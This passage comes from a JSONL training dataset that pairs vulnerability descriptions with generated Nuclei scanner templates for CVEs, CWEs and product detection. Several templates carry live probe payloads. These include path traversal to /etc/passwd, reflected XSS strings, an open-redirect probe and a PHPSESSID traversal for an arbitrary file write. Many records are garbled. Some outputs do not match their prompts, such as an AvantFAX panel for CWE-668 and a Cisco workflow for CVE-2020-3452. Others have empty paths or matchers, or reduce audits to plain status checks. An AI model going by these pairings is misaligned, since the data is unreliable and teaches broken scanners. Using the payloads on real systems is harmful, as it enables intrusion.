FortiClient Endpoint Management Server Panel - Detect\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: forticlientems-panel\n\ninfo:\n name: FortiClient Endpoint Management Server Panel - Detect\n author: h4sh5\n severity: info\n description: FortiClient Endpoint Management Server Panel - Detect\n tags: panel,fortinet,forticlient,ems,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/signin\" \n matchers:\n - type: word\n words:\n - \"FortiClient Endpoint Management Server\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "forticlientems-panel"} +{"instruction": "Generate a Nuclei template to detect Exposure of Resource to Wrong Sphere", "input": "Title: Exposure of Resource to Wrong Sphere (CWE-668)\nSummary: The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource. Resources such as files and directories may be inadvertently exposed through mechanisms such as insecure permissions, or when a program accidentally operates on the wrong object. For example, a program may intend that private files can only be provided to a specific user. This effectively defines a control sphere that is intended to prevent attackers from accessing t\nVulnerability Type: Exposure of Resource to Wrong Sphere\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: avantfax-panel\n\ninfo:\n name: AvantFAX Login Panel\n author: pikpikcu,daffainfo\n severity: info\n description: An AvantFAX login panel was discovered.\n tags: panel,avantfax,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"- AvantFAX - Login\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-668"} +{"instruction": "Generate a Nuclei template for: Gradio - Detect", "input": "Title: Gradio - Detect\nSummary: Gradio - Detect. An instance running Gradio was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: gradio-detect\n\ninfo:\n name: Gradio - Detect\n author: s4e-io\n severity: info\n description: An instance running Gradio was detected.\n tags: gradio,tech,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "gradio-detect"} +{"instruction": "Generate a Nuclei template for: Azure Load Balancer Create or Update Alert Not Configured", "input": "Title: Azure Load Balancer Create or Update Alert Not Configured\nSummary: Azure Load Balancer Create or Update Alert Not Configured. Ensure that an Azure activity log alert is fired whenever \"Create or Update Load Balancer\" events are triggered within your Microsoft Azure cloud account. Activity log alerts get triggered when a new activity log event that matches the condition specified in the alert configuration occurs. For this conformity rule, the matched condition is \"Whenever the Activity Log has an event with Category='Administrative', Signal name='Create or Upda\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: azure-lb-create-update-missing\n\ninfo:\n name: Azure Load Balancer Create or Update Alert Not Configured\n author: princechaddha\n severity: high\n description: Ensure that an Azure activity log alert is fired whenever \"Create or Update Load Balancer\" events are triggered within your Microsoft Azure cloud account. Activity log alerts get triggered when a new activity log event that matches the condition specified in the alert configuration occurs. For this conformity rule, the matched condition is \"Whenever the Activity Log has an event with Category='Administrative', Signal name='Create or Update Load Balancer (loadBalancers)'\".\n tags: cloud,devops,azure,microsoft,loadbalancer,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "azure-lb-create-update-missing"} +{"instruction": "Generate a Nuclei template for: Graphql Hasura Detect", "input": "Title: Graphql Hasura Detect\nSummary: Graphql Hasura Detect. Tags: tech, graphql, hasura\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: graphql-hasura-detect\n\ninfo:\n name: Graphql Hasura Detect\n author: princechaddha\n severity: info\n description: Graphql Hasura Detect\n tags: tech,graphql,hasura\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/graphql\" \n - \"{{BaseURL}}/api/graphql\" \n - \"{{BaseURL}}/query\" \n - \"{{BaseURL}}/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"field \"aa\" not found in type: 'query_root'\" \n part: body\n - type: word\n words:\n - \"Content-Type: text/html\" \n part: header\n - type: word\n words:\n - \"\" \n - \"\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-22"} +{"instruction": "Generate a Nuclei template for CVE-2016-3978", "input": "Title: Cross-Site Scripting (XSS) in fortinet fortios\nSummary: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the \"redirect\" parameter to \"login.\"\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: fortinet fortios\nIndicators: error, vulnerability detected", "output": "id: CVE-2016-3978\n\ninfo:\n name: Fortinet FortiOS - Open Redirect/Cross-Site Scripting\n author: 0x_Akoko\n severity: medium\n description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the \"redirect\" parameter to \"login.\"\n tags: cve2016,cve,redirect,fortinet,fortios,seclists,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login?redir=http://www.interact.sh\" \n matchers:\n - type: regex\n part: header", "category": "cve", "severity": "medium", "id": "CVE-2016-3978"} +{"instruction": "Generate a Nuclei template for CVE-2017-18362", "input": "Title: SQL Injection in connectwise manageditsync\nSummary: ConnectWise ManagedITSync integration through 2017 for Kaseya VSA is vulnerable to unauthenticated remote commands that allow full direct access to the Kaseya VSA database. In February 2019, attackers have actively exploited this in the wild to download and execute ransomware payloads on all endpoints managed by the VSA server. If the ManagedIT.asmx page is available via the Kaseya VSA web interface, anyone with access to the page is able to run arbitrary SQL queries, both read and write, without authentication.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: connectwise manageditsync\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-18362\n\ninfo:\n name: Kaseya VSA 2017 ConnectWise ManagedITSync - Remote Code Execution\n author: pussycat0x\n severity: critical\n description: ConnectWise ManagedITSync integration through 2017 for Kaseya VSA is vulnerable to unauthenticated remote commands that allow full direct access to the Kaseya VSA database. If the ManagedIT.asmx page is available via the Kaseya VSA web interface, anyone with access to the page is able to run arbitrary SQL queries, both read and write, without authentication.In February 2019, attackers actively exploited this vulnerability in the wild to download and execute ransomware payloads on all endpoints managed by the VSA server.\n tags: cve,cve2017,kaseya,connectwise,sqli,kev,vkev\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2017-18362"} +{"instruction": "Generate a Nuclei template for: OOB Request Based Interaction", "input": "Title: OOB Request Based Interaction\nSummary: OOB Request Based Interaction. The remote server fetched a spoofed DNS Name from the request.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: request-based-interaction\n\ninfo:\n name: OOB Request Based Interaction\n author: pdteam\n severity: info\n description: The remote server fetched a spoofed DNS Name from the request.\n tags: oast,ssrf,generic,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol", "category": "generic", "severity": "info", "id": "request-based-interaction"} +{"instruction": "Generate a Nuclei template for: Redis - Default Logins", "input": "Title: Redis - Default Logins\nSummary: Redis - Default Logins. Redis service was accessed with easily guessed credentials.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: redis-default-logins\n\ninfo:\n name: Redis - Default Logins\n author: tarunKoyalwar\n severity: high\n description: Redis service was accessed with easily guessed credentials.\n tags: js,redis,default-login,network,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "redis-default-logins"} +{"instruction": "Generate a Nuclei template for: Google Playable Locations API Test", "input": "Title: Google Playable Locations API Test\nSummary: Google Playable Locations API Test. Tags: token-spray, google, playable\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-googleplayablelocations\n\ninfo:\n name: Google Playable Locations API Test\n author: zzeitlin\n severity: info\n description: Google Playable Locations API Test\n tags: token-spray,google,playable,locations\n\nhttp:\n - method: GET\n path:\n - \"https://playablelocations.googleapis.com/v3:samplePlayableLocations?key={{token}}\" \n matchers:\n - type: word\n words:\n - \"error\" \n part: body", "category": "generic", "severity": "info", "id": "api-googleplayablelocations"} +{"instruction": "Generate a Nuclei template for CVE-2020-3452", "input": "Title: Vulnerability (CWE-20) in cisco adaptive_security_appliance_software and others\nSummary: A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\nVulnerability Type: Vulnerability (CWE-20)\nSeverity: high\nAffected Products: cisco adaptive_security_appliance_software, cisco firepower_threat_defense\nIndicators: error, vulnerability detected", "output": "id: cisco-asa-workflow\n\ninfo:\n name: Cisco ASA Security Checks\n author: flag007\n severity: info\n description: A simple workflow that runs all Cisco ASA related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2020-3452"} +{"instruction": "Generate a Nuclei template for CVE-2022-0218", "input": "Title: Cross-Site Scripting (XSS) in codemiq wordpress_email_template_designer\nSummary: The WP HTML Mail WordPress plugin is vulnerable to unauthorized access which allows unauthenticated attackers to retrieve and modify theme settings due to a missing capability check on the /themesettings REST-API endpoint found in the ~/includes/class-template-designer.php file, in versions up to and including 3.0.9. This makes it possible for attackers with no privileges to execute the endpoint and add malicious JavaScript to a vulnerable WordPress site.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: high\nAffected Products: codemiq wordpress_email_template_designer\nIndicators: unauthorized", "output": "id: CVE-2022-0218\n\ninfo:\n name: HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting\n author: hexcat\n severity: medium\n description: WordPress Email Template Designer WP HTML Mail allows stored cross-site scripting through an unprotected REST-API endpoint.\n tags: cve,cve2022,wordpress,wp-plugin,xss,codemiq,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?rest_route=/whm/v3/themesettings\" \n matchers:\n - type: word\n words:\n - \"\"background\":\" \n - \"\"footer\":\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2022-0218"} +{"instruction": "Generate a Nuclei template for: ChirpStack LoRaWAN Detection", "input": "Title: ChirpStack LoRaWAN Detection\nSummary: ChirpStack LoRaWAN Detection. Detects the presence of ChirpStack LoRaWAN Network-Server by identifying unique page characteristics in the HTML response.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: chirpstack-login\n\ninfo:\n name: ChirpStack LoRaWAN Detection\n author: ProjectDiscoveryAI\n severity: info\n description: Detects the presence of ChirpStack LoRaWAN Network-Server by identifying unique page characteristics in the HTML response.\n tags: panel,chirpstack,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"ChirpStack LoRaWAN\" \n part: body", "category": "generic", "severity": "info", "id": "chirpstack-login"} +{"instruction": "Generate a Nuclei template for CVE-2018-2893", "input": "Title: Unknown Vulnerability in oracle weblogic_server\nSummary: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\nVulnerability Type: Unknown Vulnerability\nSeverity: critical\nAffected Products: oracle weblogic_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-2893\n\ninfo:\n name: Oracle WebLogic Server - Remote Code Execution\n author: milo2012\n severity: critical\n description: The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.\n tags: cve,cve2018,weblogic,network,deserialization,rce,oracle,tcp,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2018-2893"} +{"instruction": "Generate a Nuclei template for: Dionaea HTTP Honeypot - Detect", "input": "Title: Dionaea HTTP Honeypot - Detect\nSummary: Dionaea HTTP Honeypot - Detect. Dionaea HTTP honeypot has been identified.\nThe response to an incorrect HTTP method reveals a possible setup of the Dioanea web application honeypot.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: dionaea-http-honeypot-detect\n\ninfo:\n name: Dionaea HTTP Honeypot - Detect\n author: UnaPibaGeek\n severity: info\n description: Dionaea HTTP honeypot has been identified.\nThe response to an incorrect HTTP method reveals a possible setup of the Dioanea web application honeypot.\n tags: dionaea,honeypot,ir,cti,discovery\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 501\n - type: word\n words:\n - \"nginx\" \n part: header\n - type: word\n words:\n - \"\" \n part: body", "category": "generic", "severity": "info", "id": "dionaea-http-honeypot-detect"} +{"instruction": "Generate a Nuclei template for: Credentials storage for Network Authentication allowed", "input": "Title: Credentials storage for Network Authentication allowed\nSummary: Credentials storage for Network Authentication allowed. Checks if the system allows storage of credentials for network authentication.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: windows-stored-network-credentials-allowed\n\ninfo:\n name: Credentials storage for Network Authentication allowed\n author: princechaddha\n severity: medium\n description: Checks if the system allows storage of credentials for network authentication.\n tags: windows,credentials,code,windows-audit\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "windows-stored-network-credentials-allowed"} +{"instruction": "Generate a Nuclei template for: VelocityJS 2.0.6 - Out of Band Template Injection", "input": "Title: VelocityJS 2.0.6 - Out of Band Template Injection\nSummary: VelocityJS 2.0.6 - Out of Band Template Injection. Tags: ssti, dast, oast\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: velocityjs-oob\n\ninfo:\n name: VelocityJS 2.0.6 - Out of Band Template Injection\n author: 0xAwali,DhiyaneshDK\n severity: high\n description: VelocityJS 2.0.6 - Out of Band Template Injection\n tags: ssti,dast,oast,oob,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "velocityjs-oob"} +{"instruction": "Generate a Nuclei template for CVE-2022-0660", "input": "Title: Vulnerability (CWE-209) in microweber microweber\nSummary: Generation of Error Message Containing Sensitive Information in Packagist microweber/microweber prior to 1.2.11.\nVulnerability Type: Vulnerability (CWE-209)\nSeverity: high\nAffected Products: microweber microweber\nIndicators: error", "output": "id: CVE-2022-0660\n\ninfo:\n name: Microweber <1.2.11 - Information Disclosure\n author: amit-jd\n severity: high\n description: Microweber before 1.2.11 is susceptible to information disclosure. An error message is generated in microweber/microweber which contains sensitive information while viewing comments from load_module:comments#search=. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: cve,cve2022,microweber,disclosure,authenticated,huntr,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2022-0660"} +{"instruction": "Generate a Nuclei template for CVE-2023-6568", "input": "Title: Cross-Site Scripting (XSS) in lfprojects mlflow\nSummary: A reflected Cross-Site Scripting (XSS) vulnerability exists in the mlflow/mlflow repository, specifically within the handling of the Content-Type header in POST requests. An attacker can inject malicious JavaScript code into the Content-Type header, which is then improperly reflected back to the user without adequate sanitization or escaping, leading to arbitrary JavaScript execution in the context of the victim's browser. The vulnerability is present in the mlflow/server/auth/__init__.py file, where the user-supplied Content-Type header is directly injected into a Python formatted string and returned to the user, facilitating the XSS attack.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: lfprojects mlflow\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-6568\n\ninfo:\n name: Mlflow - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: The vulnerability allows an attacker to inject malicious code into the Content-Type header of a POST request,\nwhich is then reflected back to the user without proper sanitization or escaping.\n tags: cve,cve2023,mlflow,xss,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n - \"Invalid content type:\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: content_type\n - type: status\n status:\n - 400", "category": "cve", "severity": "medium", "id": "CVE-2023-6568"} +{"instruction": "Generate a Nuclei template for CVE-2024-3378", "input": "Title: Cross-Site Scripting (XSS) in iboss secure_web_gateway\nSummary: A vulnerability has been found in iboss Secure Web Gateway up to 10.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /login of the component Login Portal. The manipulation of the argument redirectUrl leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 10.2.0.160 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-259501 was assigned to this vulnerability.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: iboss secure_web_gateway\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-3378\n\ninfo:\n name: iboss Secure Web Gateway - Stored Cross-Site Scripting\n author: s4e-io\n severity: medium\n description: A cross-site scripting vulnerability has been found in iboss Secure Web Gateway up to version 10.1. The vulnerability affects the /login file of the Login Portal component, where manipulation of the redirectUrl parameter leads to cross-site scripting. The attack can be launched remotely and the exploit has been disclosed to the public.\n tags: cve,cve2024,iboss,xss,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2024-3378"} +{"instruction": "Generate a Nuclei template to detect Improper Neutralization of Script-Related HTML Tags in a Web Page", "input": "Title: Improper Neutralization of Script-Related HTML Tags in a Web Page (CWE-80)\nSummary: The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as \"<\", \">\", and \"&\" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.\nVulnerability Type: Improper Neutralization of Script-Related HTML Tags in a Web Page\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: wordpress-wordfence-waf-bypass-xss\n\ninfo:\n name: Wordpress Wordfence - Cross-Site Scripting\n author: hackergautam\n severity: medium\n description: Wordpress Wordfence is vulnerable to cross-site scripting.\n tags: wordpress,wordfence,xss,bypass,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-80"} +{"instruction": "Generate a Nuclei template for CVE-2022-44952", "input": "Title: Cross-Site Scripting (XSS) in rukovoditel rukovoditel\nSummary: Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking \"Add\".\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: rukovoditel rukovoditel\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-44952\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking \"Add\".\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2022-44952"} +{"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: ibm-infoprint-lfi\n\ninfo:\n name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Local File Inclusion\n author: harshbothra_\n severity: high\n description: IBM InfoPrint 4247-Z03 Impact Matrix Printer is subject to local file inclusion.\n tags: matrix,printer,edb,ibm,lfi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/./../../../../../../../../../../etc/passwd\" \n matchers:\n - type: status\n status:\n - 200\n - type: regex\n part: body", "category": "cwe", "severity": "high", "id": "CWE-22"} +{"instruction": "Generate a Nuclei template for: Elementor Website Builder \u2013 More Than Just a Page Builder Detection", "input": "Title: Elementor Website Builder \u2013 More Than Just a Page Builder Detection\nSummary: Elementor Website Builder \u2013 More Than Just a Page Builder Detection\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-elementor\n\ninfo:\n name: Elementor Website Builder \u2013 More Than Just a Page Builder Detection\n author: ricardomaia\n severity: info\n description: Elementor Website Builder \u2013 More Than Just a Page Builder Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/elementor/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-elementor"} +{"instruction": "Generate a Nuclei template for CVE-2010-1314", "input": "Title: Path Traversal in joomlanook com_hsconfig\nSummary: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: joomlanook com_hsconfig\nIndicators: error, vulnerability detected", "output": "id: CVE-2010-1314\n\ninfo:\n name: Joomla! Component Highslide 1.5 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n tags: cve,cve2010,lfi,edb,packetstorm,joomla,joomlanook,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2010-1314"} +{"instruction": "Generate a Nuclei template for CVE-2018-0127", "input": "Title: Information Disclosure in cisco rv132w_firmware and others\nSummary: A vulnerability in the web interface of Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device, which could lead to the disclosure of confidential information. The vulnerability is due to the absence of user authentication requirements for certain pages that are part of the web interface and contain confidential information for an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device and examining the HTTP response to the request. A successful exploit could allow the attacker to view configuration parameters, including the administrator password, for the affected device. Cisco Bug IDs: CSCvg92739, CSCvh60172.\nVulnerability Type: Information Disclosure\nSeverity: critical\nAffected Products: cisco rv132w_firmware, cisco rv134w_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-0127\n\ninfo:\n name: Cisco RV132W/RV134W Router - Information Disclosure\n author: jrolf\n severity: critical\n description: Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device via the web interface, which could lead to the disclosure of confidential information.\n tags: cve,cve2018,cisco,router,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dumpmdm.cmd\" \n matchers:\n - type: word\n words:\n - \"Dump\" \n - \"MDM\" \n - \"cisco\" \n - \"admin\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2018-0127"} +{"instruction": "Generate a Nuclei template for CVE-2016-1000132", "input": "Title: Cross-Site Scripting (XSS) in cminds tooltip_glossary\nSummary: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: cminds tooltip_glossary\nIndicators: error, vulnerability detected", "output": "id: CVE-2016-1000132\n\ninfo:\n name: WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress enhanced-tooltipglossary 3.2.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cve2016,cve,wordpress,xss,wp-plugin,cminds,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"CM Tooltip Glossary\" \n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2016-1000132"} +{"instruction": "Generate a Nuclei template for CVE-2018-16671", "input": "Title: Information Disclosure in circontrol circarlife_scada\nSummary: An issue was discovered in CIRCONTROL CirCarLife before 4.3. There is system software information disclosure due to lack of authentication for /html/device-id.\nVulnerability Type: Information Disclosure\nSeverity: medium\nAffected Products: circontrol circarlife_scada\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-16671\n\ninfo:\n name: CirCarLife <4.3 - Improper Authentication\n author: geeknik\n severity: medium\n description: CirCarLife before 4.3 is susceptible to improper authentication. A system software information disclosure exists due to lack of authentication for /html/device-id. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: cve2018,cve,iot,disclosure,edb,circarlife,scada,circontrol,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/html/device-id\" \n matchers:\n - type: word\n words:\n - \"CirCarLife Scada\" \n part: header\n - type: word\n words:\n - \"circontrol\" \n part: body\n - type: regex\n part: body", "category": "cve", "severity": "medium", "id": "CVE-2018-16671"} +{"instruction": "Generate a Nuclei template for: ThinkPHP 6.0.0~6.0.1 - Arbitrary File Write", "input": "Title: ThinkPHP 6.0.0~6.0.1 - Arbitrary File Write\nSummary: ThinkPHP 6.0.0~6.0.1 - Arbitrary File Write. ThinkPHP 6.0.0~6.0.1 is susceptible to remote code execution. An attacker can upload any script file through this vulnerability to realize remote code execution takeover.We inject payload into PHPSESSID. In the buggy version, the payload is url encoded and returned as it is. In the fixed version, the payload is returned as a 32-bit hexadecimal string\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: thinkphp6-arbitrary-write\n\ninfo:\n name: ThinkPHP 6.0.0~6.0.1 - Arbitrary File Write\n author: arliya\n severity: critical\n description: ThinkPHP 6.0.0~6.0.1 is susceptible to remote code execution. An attacker can upload any script file through this vulnerability to realize remote code execution takeover.We inject payload into PHPSESSID. In the buggy version, the payload is url encoded and returned as it is. In the fixed version, the payload is returned as a 32-bit hexadecimal string\n tags: thinkphp,file-upload,rce,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Set-Cookie: PHPSESSID=%2F..%2F..%2F..%2Fpublic%2F{{random_filename}}.php\" \n part: header_1\n - type: dsl", "category": "generic", "severity": "critical", "id": "thinkphp6-arbitrary-write"} +{"instruction": "Generate a Nuclei template for: Scrapestack API Test", "input": "Title: Scrapestack API Test\nSummary: Scrapestack API Test. Real-time, Scalable Proxy & Web Scraping REST API\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-scrapestack\n\ninfo:\n name: Scrapestack API Test\n author: daffainfo\n severity: info\n description: Real-time, Scalable Proxy & Web Scraping REST API\n tags: token-spray,scrapestack\n\nhttp:\n - method: GET\n path:\n - \"https://api.scrapestack.com/scrape?access_key={{token}}&url=https://oast.me\" \n matchers:\n - type: word\n words:\n - \"

Interactsh Server

